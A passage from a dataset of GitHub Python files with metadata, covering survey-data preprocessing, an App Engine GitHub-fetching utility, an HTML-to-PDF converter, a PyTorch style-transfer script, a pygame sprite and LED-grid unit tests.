== \"Current Undergraduate\"):\r\n return 3\r\n elif(edu == \"Bachelor's Degree\"):\r\n return 4 \r\n elif(edu == \"Master's Degree\"):\r\n return 5\r\n elif(edu == \"Doctoral Degree\"):\r\n return 6\r\n\r\n\r\ndef transform(filename):\r\n \"\"\" preprocess the training data\"\"\"\r\n \"\"\" your code here \"\"\"\r\n df = pd.read_csv(filename)\r\n\r\n # Map Income\r\n df['Income'] = df['Income'].map(map_income, na_action='ignore')\r\n\r\n # Map EducationLevel\r\n df['EducationLevel'] = df['EducationLevel'].map(map_education, na_action='ignore')\r\n \r\n # Map Other Attributes\r\n for col_name, values in df.iteritems():\r\n #print('{name}: {value}'.format(name=name, value=values[0]))\r\n if(col_name in [\"UserID\", \"YOB\", \"Income\", \"EducationLevel\", \"Happy\", \"votes\"]):\r\n continue\r\n else:\r\n unique_value_list = df[col_name].unique()\r\n unique_value_list = [value for value in unique_value_list if not pd.isnull(value)]\r\n unique_value_list = sorted(unique_value_list)\r\n num_unique_value = len(unique_value_list)\r\n tmp_dict={}\r\n i=0\r\n for value in unique_value_list:\r\n if(pd.isnull(value)):\r\n continue\r\n else:\r\n tmp_dict[value] = i\r\n i += 1\r\n df[col_name] = df[col_name].map(tmp_dict,na_action='ignore')\r\n\r\n return {'data':df.as_matrix(),'target':df[\"Happy\"].as_matrix()} \r\n\r\ndef getMean(col):\r\n col_sum = np.sum(np.nan_to_num(col))\r\n col_count = np.sum(np.isnan(col))\r\n if col_count != 0:\r\n return 1.0*col_sum/col_count\r\n else:\r\n return 0\r\n\r\ndef getMedian(col):\r\n if col.shape[0] <= 0:\r\n return 0\r\n else:\r\n col=col[~np.isnan(col)]\r\n return np.median(col)\r\n\r\ndef getMostFrequent(col):\r\n col=col[~np.isnan(col)]\r\n if col.shape[0] <= 0:\r\n return 0\r\n # Count and record occurance of all the values\r\n counter = dict()\r\n for entry in col:\r\n if entry not in counter.keys():\r\n counter[entry] = 0\r\n else:\r\n counter[entry] += 1\r\n # Find the most frequent value\r\n vals = counter.keys()\r\n occur = 0\r\n fre_val = 0\r\n for val in vals:\r\n if counter[val] > occur:\r\n fre_val = val\r\n occur = counter[val]\r\n return fre_val\r\n\r\n\r\ndef fill_missing(X, strategy, isClassified):\r\n \"\"\"\r\n @X: input matrix with missing data filled by nan\r\n @strategy: string, 'median', 'mean', 'most_frequent'\r\n @isclassfied: boolean value, if isclassfied == true, then you need build a\r\n decision tree to classify users into different classes and use the\r\n median/mean/mode values of different classes to fill in the missing data;\r\n otherwise, just take the median/mean/most_frequent values of input data to\r\n fill in the missing data\r\n \"\"\"\r\n \r\n \r\n # delete the HAPPY & VOTES column:\r\n X = np.delete(X,7,1)\r\n #X = np.delete(X,X.shape[1]-1,1)\r\n (n, m) = X.shape\r\n \r\n if isClassified == False:\r\n discarded_rows = []\r\n for i in range(1,m):\r\n col = X[:,i]\r\n # Self-defined strategy for filling missing data:\r\n # Mean: year of born\r\n if i == 1:\r\n sub_val = getMedian(col)\r\n # Median: income, education level\r\n if i == 3 or i == 5:\r\n sub_val = getMean(col)\r\n # Most Frequent Value: other uncompared labels\r\n else:\r\n sub_val = getMostFrequent(col)\r\n\r\n row_id = np.where(np.isnan(X[:,i]))\r\n X[row_id,i] = sub_val\r\n\r\n else:\r\n gender_col_index = 2\r\n edu_col_index = 5\r\n edu_max = max(X[:,edu_col_index])\r\n \r\n # delete data with no gender or no education info:\r\n discarded_rows = np.union1d(np.where(np.isnan(X[:,gender_col_index]))[0],np.where(np.isnan(X[:,edu_col_index]))[0])\r\n \r\n X = np.delete(X,np.where(np.isnan(X[:,gender_col_index])),0)\r\n X = np.delete(X,np.where(np.isnan(X[:,edu_col_index])),0)\r\n \r\n \r\n for i in range(1,m):\r\n \r\n if i == gender_col_index or i == edu_col_index:\r\n continue\r\n \r\n col = X[:,i]\r\n for gen in range(2):\r\n for edu in range(int(edu_max)+1):\r\n # Get the indexes of instances belonging to a specific sub-classes:\r\n gen_indexes = np.where(X[:,gender_col_index] == gen)\r\n edu_indexes = np.where(X[:,edu_col_index] == edu)\r\n indexes = np.intersect1d(gen_indexes,edu_indexes)\r\n \r\n sub_col = col[indexes]\r\n # Self-defined strategy for filling missing data:\r\n # Mean: year of born\r\n if i == 1:\r\n sub_val = getMean(sub_col)\r\n # Median: income, education level\r\n if i == 3 or i == 5:\r\n sub_val = getMedian(sub_col)\r\n # Most Frequent Value: other uncompared labels\r\n else:\r\n sub_val = getMostFrequent(sub_col)\r\n \r\n\r\n all_nan_indexes = np.where(np.isnan(X[:,i]))\r\n sub_nan_indexes = np.intersect1d(all_nan_indexes,indexes)\r\n #print X[sub_nan_indexes,i]\r\n X[sub_nan_indexes,i] = sub_val\r\n #print X[sub_nan_indexes,i]\r\n\r\n for i in range(m):\r\n col = X[:,i]\r\n if np.sum(np.isnan(col)) > 0:\r\n print(\"Column {0} has nan values!\".format(i))\r\n\r\n X = X.astype(int)\r\n\r\n # Do one-hot encoding on uncomparable attributes:\r\n hold_col_index = 4\r\n party_col_index = 6\r\n\r\n append_col_set = np.concatenate(([party_col_index],[hold_col_index]))\r\n #print append_col_set\r\n\r\n for col_index in append_col_set:\r\n enc = OneHotEncoder()\r\n enc.fit(X[:,col_index:col_index+1])\r\n new_cols = enc.transform(X[:,col_index:col_index+1]).toarray()\r\n #print X[:10,:8]\r\n X = np.delete(X,col_index,axis=1)\r\n #print X.shape\r\n #print new_cols.shape\r\n X = np.insert(X,[col_index],new_cols,axis=1)\r\n #print X[:10,:14]\r\n\r\n\r\n return X,discarded_rows\r\n", "repo_name": "LilyLidl/What-Makes-People-Happy", "sub_path": "preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 7070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.union1d", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 207, "usage_type": "call"}]} +{"seq_id": "11725299391", "text": "from __future__ import (\n division,\n absolute_import,\n division,\n generators,\n nested_scopes,\n print_function,\n with_statement\n)\n\nimport os\nimport json\nimport urllib\nimport base64\nimport hashlib\nimport logging\nfrom operator import itemgetter\n\n# google appengine imports\nimport webapp2\nfrom google.appengine.api import mail\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\nfrom google.appengine.api import urlfetch\nfrom google.appengine.ext.webapp import template\n\n# for debugging exceptions\nimport sys\nimport traceback\n\n# application specific\nfrom module_utils import get_hardware_data, get_module_data\n\n# authentication data\nclient_auth_data = memcache.get('client_auth_data')\nif not client_auth_data:\n with open('auth_data.json', 'r') as fh:\n auth_data = json.load(fh)\n client_auth_data = auth_data[\"client_auth_data\"]\n\n\ndef _get_live_data(handler, fragment):\n \"\"\"\n get_url_content's fragment['url'], b64decode's module['content']\n \"\"\"\n module = get_url_content(handler, fragment['url'])\n assert 'content' in module\n\n return base64.b64decode(module['content'])\n\n\ndef get_live_hardware_data(handler, fragment):\n \"\"\"\n Given a get_tree fragment,\n returns hardware data in a python dict\n \"\"\"\n return get_hardware_data(_get_live_data(handler, fragment))\n\n\ndef get_live_module_data(handler, fragment):\n \"\"\"\n Given a get_tree fragment,\n returns module data in a python dict\n \"\"\"\n return get_module_data(_get_live_data(handler, fragment))\n\n\ndef _get_tree(handler=None):\n \"\"\"\n Returns the file hierarchy/tree\n \"\"\"\n\n result = get_url_content(handler, 'https://api.github.com/repos/DCPUTeam/DCPUModules/git/trees/master')\n\n assert result['tree'], result\n return result['tree']\n\n\ndef get_modules(handler=None):\n \"\"\"\n Returns the file hierarchy/tree, filtered by a .lua extension\n \"\"\"\n tree = _get_tree(handler)\n\n return [\n fragment\n for fragment in tree\n if fragment['path'].endswith('.lua')\n ]\n\n\ndef get_module_names(handler):\n \"\"\"\n Returns list containing the path attributes of all modules\n \"\"\"\n\n modules = get_modules(handler)\n modules = map(itemgetter('path'), modules)\n return map(rpart, modules)\n\n\ndef get_url_content(handler, url):\n \"\"\"\n A wrapper around authed_fetch_json, caches results to help keep wait time short\n \"\"\"\n\n url_hash = md5_hash(url)\n result = memcache.get(url_hash)\n\n if result is None:\n logging.info('Getting the result from the GitHub API')\n\n try:\n result = authed_fetch_json(url)\n except urlfetch.DownloadError as e:\n logging.error(e)\n handler.error(408)\n return []\n else:\n memcache.set(url_hash, result)\n\n else:\n logging.info('Memcache get successful; %.40s' % result)\n # check if the api limit has been reached\n assert not result.get('message', '').startswith(\n 'API Rate Limit Exceeded for'), 'API Limit reached'\n return result\n\n\ndef authed_fetch(url, headers=None):\n # add admin contact, auth_data\n headers = headers or {}\n headers.update({'X-Admin-Contact': 'admin@lysdev.com'})\n\n # build the url\n url += '&' if '?' in url else '?'\n url += urllib.urlencode(client_auth_data)\n\n r = urlfetch.fetch(url=url, headers=headers)\n\n remaining = r.headers.get('x-ratelimit-remaining')\n if remaining:\n logging.info('{} requests remaining for this hour.'.format(remaining))\n memcache.set('requests_remaining', int(remaining))\n else:\n logging.info(\n 'Could not determine number of requests remaining for this hour')\n logging.info(r.content)\n\n return r\n\n\ndef authed_fetch_json(*args, **kwargs):\n \"\"\"\n parse json output from proxied authed_fetch\n \"\"\"\n return json.loads(authed_fetch(*args, **kwargs).content)\n\n\nclass BaseRequestHandler(webapp2.RequestHandler):\n def handle_exception(self, exception, debug_mode):\n if development():\n return super(BaseRequestHandler, self).handle_exception(exception, debug_mode)\n\n lines = ''.join(traceback.format_exception(*sys.exc_info()))\n logging.error(lines)\n template_values = {\n 'traceback': lines.replace('\\n', '
')\n }\n html = self.dorender('error.html', template_values, write=False)\n mail.send_mail(\n sender='debugging@dcputoolchain-module-site.appspotmail.com',\n to=\"jack.thatch@gmail.com\",\n subject='Caught Exception',\n body=lines,\n html=html)\n if users.is_current_user_admin():\n raise exception\n else:\n self.error(500)\n if isinstance(exception, AssertionError):\n self.dorender('unexpected_result.html', {})\n\n def dorender(self, tname='base.html', values=None, write=True):\n \"\"\"\n automates some stuff so we dont have to type\n it in everytime we want to use a template\n \"\"\"\n\n self.response.headers['Content-Type'] = 'text/html'\n path = os.path.join(os.path.dirname(__file__), 'templates/' + tname)\n\n data = template.render(path, values or {})\n\n if write:\n self.response.out.write(data)\n else:\n return data\n\n\ndef development():\n return os.environ['SERVER_SOFTWARE'].find('Development') == 0\n\n\ndef rpart(path):\n return path.rpartition('/')[-1]\n\n\ndef md5_hash(string):\n return hashlib.md5(string).hexdigest()\n", "repo_name": "Mause/dcputoolchain-module-site", "sub_path": "src/dtmm_utils.py", "file_name": "dtmm_utils.py", "file_ext": "py", "file_size_in_byte": 5554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "google.appengine.api.memcache.get", "line_number": 35, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 35, "usage_type": "name"}, {"api_name": "json.load", "line_number": 38, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 49, "usage_type": "call"}, {"api_name": "module_utils.get_hardware_data", "line_number": 57, "usage_type": "call"}, {"api_name": "module_utils.get_module_data", "line_number": 65, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 98, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache.get", "line_number": 108, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 111, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch.DownloadError", "line_number": 115, "usage_type": "attribute"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 115, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 116, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache.set", "line_number": 120, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 120, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 123, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 137, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch.fetch", "line_number": 139, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 139, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 143, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache.set", "line_number": 144, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 144, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 146, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 148, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 157, "usage_type": "call"}, {"api_name": "webapp2.RequestHandler", "line_number": 160, "usage_type": "attribute"}, {"api_name": "traceback.format_exception", "line_number": 165, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 165, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 166, "usage_type": "call"}, {"api_name": "google.appengine.api.mail.send_mail", "line_number": 171, "usage_type": "call"}, {"api_name": "google.appengine.api.mail", "line_number": 171, "usage_type": "name"}, {"api_name": "google.appengine.api.users.is_current_user_admin", "line_number": 177, "usage_type": "call"}, {"api_name": "google.appengine.api.users", "line_number": 177, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 191, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.template.render", "line_number": 193, "usage_type": "call"}, {"api_name": "google.appengine.ext.webapp.template", "line_number": 193, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 202, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "71292949245", "text": "#\n# FILENAME.\n# topdf.py - To PDF Python App.\n#\n# FUNCTIONAL DESCRIPTION.\n# The app converts HTML files into pdf files.\n#\n# NOTICE.\n# Author: visualge@gmail.com (CountChu)\n# Created on 2023/4/5\n# Updated on 2023/4/29\n#\n\nimport argparse\nimport sys\nimport os\nimport pdfkit\n\nfrom core import util\n\nimport pdb\nbr = pdb.set_trace\n\ndef build_args():\n desc = '''\n Usage 1: python topdf.py -i out-ans-html -o out-ans-pdf\n Usage 2: python topdf.py -f 230328.TEE.html -i out-ans-html -o out-ans-pdf \n'''\n #\n # Build an ArgumentParser object to parse arguments.\n #\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n description=desc)\n\n parser.add_argument(\n '-i',\n dest='input',\n required=True,\n help='The input directory that contains HTML files. E.g., \"output-html\"') \n\n parser.add_argument(\n '-o',\n dest='output',\n help='The output directory where the generated PDF files. E.g., \"output-pdf\"') \n\n parser.add_argument(\n '-f',\n dest='file',\n help='An HTML file in the input directory. E.g., \"230328.TEE.html\"') \n\n parser.add_argument(\n '-s',\n dest='silence',\n action='store_true',\n help='To display less messages.') \n \n #\n # Check arguments.\n #\n\n args = parser.parse_args()\n\n return args \n\ndef html_to_pdf(fn_css, fn_html, fn_pdf): \n print('Generating: %s' % (fn_pdf))\n \n f = open(fn_css)\n css_text = f.read()\n f.close()\n css_text = '' % css_text \n\n\n f = open(fn_html, encoding='utf-8')\n html_text = f.read()\n f.close()\n\n link_text = ''\n assert html_text.find(link_text) != -1\n\n html_text = html_text.replace(link_text, css_text)\n \n pdfkit.from_string(html_text, fn_pdf)\n\ndef main():\n\n #\n # Read arguments.\n #\n\n args = build_args()\n\n #\n # Check if the input directory exists.\n #\n\n if not os.path.exists(args.input):\n print('Error. The directory does not exist.')\n print(args.input)\n sys.exit(1) \n\n #\n # Check if the output directory exists. If not, make it.\n #\n\n if not os.path.exists(args.output):\n print('The directory does not exist. Building it')\n print(args.input)\n os.mkdir(args.output)\n\n #\n # Collect input HTML files.\n #\n\n bn_fn_ls = util.collect_input_files(args.file, args.input) \n\n #\n # Handle each HTML files.\n #\n\n for bn, fn in bn_fn_ls:\n name, ext = util.get_name(fn)\n if ext != '.html':\n print('Skip %s' % fn)\n continue \n\n fn_out = os.path.join(args.output, \"%s.pdf\" % (name))\n fn_css = os.path.join(args.input, \"github.css\")\n html_to_pdf(fn_css, fn, fn_out) \n\nif __name__ == '__main__':\n main()\n\n\n\n", "repo_name": "CountChu/ChatGptAnswerPdf", "sub_path": "topdf.py", "file_name": "topdf.py", "file_ext": "py", "file_size_in_byte": 3005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pdb.set_trace", "line_number": 22, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.RawTextHelpFormatter", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pdfkit.from_string", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 111, "usage_type": "call"}, {"api_name": "core.util.collect_input_files", "line_number": 117, "usage_type": "call"}, {"api_name": "core.util", "line_number": 117, "usage_type": "name"}, {"api_name": "core.util.get_name", "line_number": 124, "usage_type": "call"}, {"api_name": "core.util", "line_number": 124, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}]} +{"seq_id": "636947230", "text": "from __future__ import division\n\n\nfrom torchvision import models\nfrom torchvision import transforms\nimport torchvision\nimport torch.nn as nn\nimport torch\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef load_image(image_path, transform=None, max_size=None, shape=None):\n image = Image.open(image_path)\n if max_size:\n scale = max_size /max(image.size)\n size = np.array(image.size)*scale\n image = image.resize(size.astype(int),Image.ANTIALIAS)\n\n if shape:\n image = image.resize(shape,Image.LANCZOS)\n print(\"image size = \",image.size)\n\n if transform:\n image = transfrom(image).unsqueeze(0)\n print(image.shape)\n\n return image.to(device)\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n mean = [0.485,0.456,0.406],\n std = [0.229,0.224,0.225]\n )\n])\n\ncontent = load_image('content.jpeg',transform,max_size=400)\nstyle = load_image('style.jpeg',transform,shape=[content.size(3),content.size(2)])\n\n#print(content.shape)\n#print(content.size(2),content.size(3))\nunloader = transforms.ToPILImage()\nplt.ion()\ndef imshow(tensor,title=None):\n image = tensor.cpu().clone()\n image = unloader(image)\n plt.imshow(image)\n if title is not None:\n plt.title(title)\n plt.pause(0.001)\nplt.figure()\nimshow(style[0],title='StyleImage')\nimshow(content[0],title='ContentImage')\n\n#定义一个VGG用来特征提取\nclass VGGNet(nn.Module):\n def __init__(self):\n super(VGGNet,self).__init__()\n self.select = ['0','5','10','19','28']\n self.vgg = models.vgg19(pretrained=True).features\n def forward(self,x):\n features = []\n for name,layer in self.vgg._modules.items():\n x = layer(x)\n if name in self.select:\n features.append(x)\n return features\n\ntarget = content.clone().requires_grad_(True)\noptimizer = torch.optim.Adam([target], lr=0.003, betas=[0.5,0.999])\nvgg =VGGNet().to(device).eval()\n\ntotal_step = 2000\nstyle_weight = 100.0\nfor step in range(total_step):\n target_features = vgg(target)\n content_features = vgg(content)\n style_features = vgg(style)\n style_loss = content_loss = 0\n for f1,f2,f3 in zip(target_features,content_features,style_features):\n content_loss += torch.mean((f1-f2)**2)\n _,c,h,w =f1.size()\n f1 = f1.view(c,h*w)\n f3 = f3.view(c,h*w)\n f1 = torch.mm(f1,f1.t())\n f3 = torch.mm(f3,f3.t())\n style_loss += torch.mean((f1-f3)**2)/(c*h*w)\n loss = content_loss + style_weight*style_loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if step % 10 ==0:\n print('step [{}/{}],content loss : {},style loss : {}'\n .format(step,total_step,content_loss.item(),style_loss.item()))\n\ndenorm = transform.Normalize((-2.12,-2.04,-1.80),(4,37,4,46,4,44))\nimg = target.clone().squeeze()\nimg = denorm(img).clamp_(0,1)\nplt.figure()\nimshow(img,title='Target Image')\n", "repo_name": "XuLongjia/PyTorchLearning", "sub_path": "9ImageTransfer.py", "file_name": "9ImageTransfer.py", "file_ext": "py", "file_size_in_byte": 3062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.device", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 23, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 63, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.mean", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "16258062372", "text": "from pygame.locals import *\nimport pygame\n\nWHITE = (255,255,255)\nGREY = (120,120,120)\nclass FieldGraphics(pygame.sprite.Sprite):\n # Constructor. Pass in the color of the block,\n # and its x and y position\n def __init__(self, color, width, height):\n # Call the parent class (Sprite) constructor\n pygame.sprite.Sprite.__init__(self)\n\n # Create an image of the block, and fill it with a color.\n # This could also be an image loaded from the disk.\n self.image = pygame.Surface([width, height])\n self.image.fill(color)\n self.image.set_colorkey(WHITE)\n # Fetch the rectangle object that has the dimensions of the image\n # Update the position of this object by setting the values of rect.x and rect.y\n pygame.draw.rect(self.image, color, [0, 0, width, height])\n self.rect = self.image.get_rect()\n\n def placeSign(self, isCross):\n if isCross:\n self.image = pygame.image.load(\"cross.png\").convert_alpha()\n else:\n self.image = pygame.image.load(\"circle.png\").convert_alpha()\n", "repo_name": "LordRysiek/MojaSiec2", "sub_path": "FieldGraphics.py", "file_name": "FieldGraphics.py", "file_ext": "py", "file_size_in_byte": 1078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.sprite", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "43850533013", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pytest\nfrom led.led import main, get_response, parse_args\nimport sys, os\n\n__author__ = \"Peng Ye\"\n__copyright__ = \"Peng Ye\"\n__license__ = \"GLP3\"\n\n\ndef test_get_response_001():\n # assertion_001:\n #\tverify if the return value is None if input the\n # correct filename or wrong url address\n assert get_response('worth_path_name') == None\n\ndef test_get_response_002(capsys):\n # assertion_002:\n # Verify if the the output has expected information\n # if input the correct filename or wrong url address\n get_response('worth_path_name')\n out,err = capsys.readouterr()\n assert \"No such file or directory\" in out\n\ndef test_main_003(capsys):\n # assertion_003:\n # Verify when 'turn on' the light from (120,120) to\n # (129,129), there will be 100 lights be turned on\n current_path = os.path.dirname(os.path.abspath(__file__))\n sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_003.txt\"]\n main()\n out,err = capsys.readouterr()\n assert \"100\" in out\n\ndef test_main_004(capsys):\n # assertion_004:\n # Verify when 'turn on' the light from (120,120) to\n # (129,129), and 'turn off' the light from (110,110) to (120,120),\n # then there will be 99 lights turning on\n current_path = os.path.dirname(os.path.abspath(__file__))\n sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_004.txt\"]\n main()\n out,err = capsys.readouterr()\n assert \"99\" in out\n\ndef test_main_005(capsys):\n # assertion_005:\n # Verify when 'switch' the light from (120,120) to\n # (123,123), and 'switch' the light from (121,121) to (122,122),\n # then there will be 12 lights turning on\n current_path = os.path.dirname(os.path.abspath(__file__))\n sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_005.txt\"]\n main()\n out,err = capsys.readouterr()\n assert \"12\" in out\n\ndef test_main_006(capsys):\n # assertion_006:\n # Verify incorrect keywords of handling on the light will do nothing\n # but the program will not raise the error\n current_path = os.path.dirname(os.path.abspath(__file__))\n sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_006.txt\"]\n main()\n out,err = capsys.readouterr()\n assert \"0\" in out\n assert err == ''\n\ndef test_main_007(capsys):\n # assertion_007:\n # Verify when 'turn on' the light from (-1,-1) to\n # (1,1), and 'turn on' the light from (999,999) to (1000,1000),\n # then there will be 5 lights turning on, in which the outside\n # of the 